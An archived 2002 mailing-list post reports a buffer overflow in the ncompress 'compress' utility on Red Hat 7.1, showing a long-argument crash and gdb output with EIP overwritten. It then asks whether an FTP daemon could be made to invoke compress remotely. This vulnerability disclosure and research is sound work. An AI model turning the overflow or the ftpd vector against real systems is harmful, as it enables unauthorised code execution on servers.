Vulnerability Development: compress(vul) + ftpd(?)

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Vulnerability Development mailing list archives

compress(vul) + ftpd(?)

From: HypH <hyphen () go2 pl>
Date: Tue, 5 Mar 2002 14:43:06 +0100

[hyph () port ~]$ rpm -qf `which compress`
ncompress-4.2.4-21
[hyph () port ~]$ compress `perl -e 'print "A" x 1100'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: File
 name too long
Segmentation fault  (core dumped)
[hyph () port ~]$gdb compress core
[...]
#0  0x41414141 in ?? ()
(gdb) i r
eax            0x461    1121
ecx            0x1      1
edx            0x40158be0       1075153888
ebx            0x41414141       1094795585
esp            0xbffff368       0xbffff368
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141 <--- :-))
[...]
[hyph () port ~]$ cat /etc/redhat-release
Red Hat Linux release 7.1 (Seawolf)
[hyph () port ~]$ ls -l `which compress`
-rwxr-xr-x    2 root     root        16156 gru 12  2000 /usr/bin/compress

Compress isn`t suid so it gives us no benefit. And here`s my question:
Is there any way to force the ftpd to 'compress' a file before sending it, 
from the client`s side. I`m asking for this particular daemon because of
this: 

[hyph () port ~]$ ls -l /var/ftp/bin/ 
razem 400k
-r--------    1 root     root          313 sie  2  2001 bin.md5
-rwxr-xr-x    2 root     root          16k gru 12  2000 compress <-- :-))
-rw-------    1 root     root         848k mar  3 10:07 core
-rwxr-xr-x    2 root     root          48k sie  8  2000 cpio
-rwxr-xr-x    4 root     root          49k lut  8  2001 gzip
-rwxrwx--x    2 root     root          45k mar 14  2001 ls
-rwxr-xr-x    2 root     root         147k mar  6  2001 tar

The benefits would be obvious.

Sorry if it`s a known bug/vulnerability (but I`ve never heared `bout it before)

-- 

:::::::::::::::::::::::::::
Linux isn`t unfriendly 
he`s only picky in choosing 
his friends.
:::::::::::::::::::::::::::

By Date By Thread

Current thread:

compress(vul) + ftpd(?) HypH (Mar 05)
- Re: compress(vul) + ftpd(?) H D Moore (Mar 07)
- Message not available
  - Re: compress(vul) + ftpd(?) HypH (Mar 07)
    - Re: compress(vul) + ftpd(?) H D Moore (Mar 07)
    - Re: compress(vul) + ftpd(?) HypH (Mar 09)
    - Re: compress(vul) + ftpd(?) KF (Mar 09)